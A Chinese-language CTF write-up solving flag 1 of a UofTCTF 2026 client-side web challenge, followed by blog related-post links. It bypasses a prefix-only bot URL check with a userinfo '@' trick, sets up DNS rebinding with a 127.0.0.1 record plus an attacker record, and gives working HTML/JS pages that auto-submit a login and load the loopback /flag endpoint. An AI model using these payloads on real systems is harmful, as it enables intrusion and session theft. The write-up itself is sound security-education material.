UofTCTF 2026 Unrealistic Client-Side Challenge - Flag 1

A5rZ2026-01-14 8:49

很久没写博客了,第一次拿国际赛难题的血,还是个非预期,写一下

题目描述

Han Shangyan was tired of Team K&K getting skill-diffed every time they were faced with client-side web challenges. After some self-reflection, he finally accepted that training his squad solely with aim trainers might not be the best approach. Instead, he decided to make a totally realistic CTF challenge for his team to practice on.

Submit flag 1 here. Both challenges use the same attachment.

Note: Port 5001 is not exposed on the remote instance. However, the bot can still access it and this does not interfere with the intended solution.

Author: SteakEnthusiast

思考过程

flag 1

flag1 的位置是

python 复制代码 
@app.get("/flag")
def flag():
    """
    /flag:将 flag1 写入 session 的额外 claims(extra_claims={"flag": flag})
    限制条件:
    - 必须已登录(有 session cookie)
    - 访问来源必须是 loopback(127.0.0.1 / ::1)
    """
    session = _parse_session()
    if not session:
        abort(403)
    if not _is_loopback(request.remote_addr):
        abort(403)

    flag = _read_flag_file("flag1.txt")
    resp = make_response("OK")
    issue_session_cookie(resp, int(session["sub"]), extra_claims={"flag": flag})
    return resp

boot 只检查以什么开头

python 复制代码 
def _validate_bot_url(url: str) -> str:
    """
    校验 /bot 提交的 URL:
    - 只允许以 http://127.0.0.1:5000 开头(强制指向本机主站)
    """
    url = url.strip()
    if not url.startswith("http://127.0.0.1:5000"):
        raise ValueError("URL must start with http://127.0.0.1:5000")
    return url

利用这种方式我们可以将bot导向任意网站

复制代码 
http://127.0.0.1:5000@{host}

接下来,我使用可控域名为其添加两个解析结果

复制代码 
A 127.0.0.1
A 攻击者服务器

将攻击服务器的5001端口挂载如下内容,因为攻击服务器不开放5000,访问5000会降级为127.0.0.1

index.html

html 复制代码 
<form id="login" action="http://rebind.xxx:5000/login?check=win" method="post">
  <input name="username" value="A5rZ">
  <input name="password" value="A5rZ">
</form>

<script>
window.open("http://rebind.xxx:5001/exp.html");
document.getElementById("login").submit();
</script>

exp.html

html 复制代码 
<script>
  setTimeout(() => {
    window.open("http://rebind.xxx:5001/exp1.html");
    window.location.href = "http://rebind.xxx:5000/flag?check=win";
  }, 2000);
</script>

exp1.html

html 复制代码 
<script>
  setTimeout(() => {
    window.location.href = "http://rebind.xxx:5001/?check=win";
  }, 2000);
</script>

cookie同源协议不区分端口,因此我们成功获得flag1

相关推荐
祁白_1 天前
[0xV01D]_Glass Parcel_writeUp
大数据·安全·ctf·writeup
祁白_5 天前
[HCTF 2018]WarmUp1
安全·渗透·测试·ctf·writeup
祁白_5 天前
[BJDCTF2020]Mark loves cat (WriteUp)
web安全·ctf·writeup
祁白_5 天前
无字母数字 Webshell 绕过
笔记·web安全·测试·ctf
yv_308 天前
CTFShow-XXE
ctf·ctfshow·xxe漏洞
酿情师13 天前
2026平航杯倩倩手机逆向包逆向全过程(逆向鸿蒙系统app包)
华为·智能手机·harmonyos·逆向·ctf·re·取证
其实防守也摸鱼13 天前
ctfshow--Crypto(crypto1-14)解题步骤
java·开发语言·网络·安全·密码学·ctf·ctfshow
Chen--Xing14 天前
NSSCTF -- [tangcuxiaojkuai] -- easy_factor
ctf·writeup·nssctf·crypto
Chen--Xing15 天前
NSSCTF -- [tangcuxiaojkuai] -- easy_mod
ctf·writeup·crypto
其实防守也摸鱼16 天前
CTF密码学综合教学指南--第九章
开发语言·网络·python·安全·网络安全·密码学·ctf
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03装上就回不去了:CodeGraph 让 AI 编程效率飙升 92%,它到底做了什么?04CC-Switch & Claude 基于 Linux 服务器安装使用指南05【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07几个好用的ip纯净度检测网站08【AI】2026 年具身智能模型和世界模型总结09用了半年 OpenRouter,我换到了 Ofox.ai — 两个 AI API 聚合平台的真实对比10codex app每次打开重连5次Reconnecting问题解决